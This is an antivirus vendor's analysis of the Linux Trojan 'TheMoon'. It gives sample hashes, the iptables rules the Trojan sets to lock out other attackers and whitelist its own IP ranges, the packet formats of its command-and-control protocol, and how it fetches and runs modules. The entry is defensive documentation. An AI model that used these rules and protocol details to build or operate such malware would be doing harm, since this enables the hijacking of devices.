Library
My library

Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Themoon.2

Added to the Dr.Web virus database: 2016-09-30

Virus description added:

SHA1: 2b82c715c2f1480b57e59bd7c55ef32db312e008
c05bd53f91032f2c8cae509477d760537f014621

A Trojan for Linux, also known as “TheMoon”, that is designed to download various files to the infected device. All examined samples had the “.nttpd” file name. In order to store its PID, the Trojan uses the “.nttpd” file with the following contents:

<pid>,<module_id>

In the head module, module_id equals to 17.

If it is successfully launched, the Trojan deletes its original file and updates the iptables utility with the following rules:

"INPUT -p tcp --dport 8080 -j DROP"
"INPUT -p tcp --dport 443 -j DROP"
"INPUT -p tcp --dport 80 -j DROP"
"INPUT -p tcp --dport 23 -j DROP"
"INPUT -p tcp --dport 22 -j DROP"
"INPUT -s 46.148.18.0/24 -j ACCEPT"
"INPUT -s 185.56.30.0/24 -j ACCEPT"
"INPUT -s 217.79.182.0/24 -j ACCEPT"
"INPUT -s 85.114.135.0/24 -j ACCEPT"
"INPUT -s 95.213.143.0/24 -j ACCEPT"
"INPUT -s 185.53.8.0/24 -j ACCEPT"

Thus, other Trojans will not be able to compromise a device.

After that, the following three functions that perform main malicious activity are launched by the malware program:

clk
net
dwl

clk

This function launches two child threads. The first thread calculates time of the Trojan’s continuous work in infinite loop. The second one connects to the command and control server every hour by going through all IPs of C&C servers hard coded in the Trojan’s body until it finds an active one. To send information to the server, the malware program uses a 48-byte buffer where all bytes are equal to zero, and the first byte is 0x23. Then the Trojan waits for a buffer of the same size as a response from the server. After the buffer is received, the malware program retrieves the penultimate DWORD value with 0x7C558180 added to it. The obtained number is the value of the current time.

net

A function that adds a new C&C server of the Trojan, in addition to those that are already hard coded in its body, and receives data necessary for modules updating.

The Trojan opens the 5142 port using iptables:

INPUT -p udp --dport %u -j ACCEPT

After that, it launches a thread for listening to this port and waits for a 263-byte package with the following structure:

OffsetData
0x00Package size
0x01The function number (0 or 1)
0x02Determines whether a registration confirmation should be sent
0x030x8E
0x04+Package data

First, the Trojan registers the server by receiving a package that looks as follows:

OffsetData
0x000x08
0x010x00
0x02Determines whether a registration confirmation should be sent
0x030x8E
0x04DWORD with the 0x6D6163F3 value

The Trojan saves the dwIp % 0x64 value and the value of the IP address from which the package was sent. If the third byte is identified, the malicious program sends the same buffer. Besides, it can forward the following control packages to the server:

OffsetData
0x000x0C
0x010x00
0x02Is ignored
0x030x8E
0x04DWORD with the 0x6D6163F3 value
0x08Is ignored
0x0CAn IP address which the package is sent to

If the DWORD value at offset of 0x0C is not zero, the Trojan sends a registration request package to a specified IP. Otherwise, it sends the package to the server from which a command has been received.

The package looks as follows:

OffsetData
0x00<= 0x14
0x010x01
0x02Is ignored
0x030x8E
0x04st_module

The following structure is stored at offset of 0x04:

struct st_module
{
  _DWORD dwip;
  _DWORD module_id;
  _DWORD size;
  char filename[8];
};

The Trojan checks whether an IP from this structure is among the hard coded or registered server addresses. After that, it copies the structure to its memory, and the structure is then forwarded to the dwl thread.

dwl

It waits until the st_module structure is padded by the net thread. Then it generates the pid file name:

StModule->filename + ".pid"

and, depending on the presence of this file, checks whether the corresponding module is launched. At that, either the name of the module or its identifier is compared. If the module is launched, the process is then “killed”.

After that, the Trojan establishes TCP connection to StModule->dwip and sends the following line:

StModule->filename,StModule->module_id

The server, in turn, sends the module. The Trojan saves it in the StModule->filename file. Then the malicious program sets the 448 privileges and executes the module.

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number